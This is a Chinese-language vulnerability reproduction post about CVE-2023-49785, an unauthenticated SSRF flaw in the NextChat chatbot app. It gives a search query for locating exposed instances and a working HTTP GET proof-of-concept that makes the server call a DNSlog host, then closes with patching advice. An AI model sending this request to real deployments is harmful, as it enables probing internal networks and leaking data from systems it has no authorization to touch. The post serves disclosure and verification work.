一:漏洞描述
NextChat(又名 ChatGPT-Next-Web)是用户最流行的独立 Gen AI 聊天机器人应用程序之一。用户可以通过这个程序与GPT进行交互。这是一个GitHub项目,拥有超过 63K+ 的 star 和 52K+ 的分支。该聊天机器人应用程序主要部署在中国和美国,有超过 7500 个暴露实例。
该产品存在服务器端请求伪造漏洞,2024年3月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。
二:漏洞影响版本
NextChat
三:网络空间测绘查询
title="NextChat"
五:漏洞复现
POC:
GET /api/cors/http:%2f%2fnextchat.[DNSlog]%23 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
SSRF漏洞复现通常使用DNSlog方式
服务器端请求伪造(Server-Side Request Forgery,SSRF)是一种安全漏洞,通常出现在允许用户提供URL并对其进行处理的地方,比如像图片上传、URL预览或其他外部资源加载的功能。攻击者可以利用这些功能,构造恶意的URL,使服务器发起对内部系统、本地文件或其他未授权的网络位置的请求。
使用DNSlog生成一个域名,替换POC中【DNSLog】内容
收到DNS解析记录
六:批量检测
七:修复建议
避免将应用程序暴露给公共互联网
建议更新当前系统或软件至最新版,完成漏洞的修复。
699fea3d4a20240523213735.zip
zip文件
968B
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容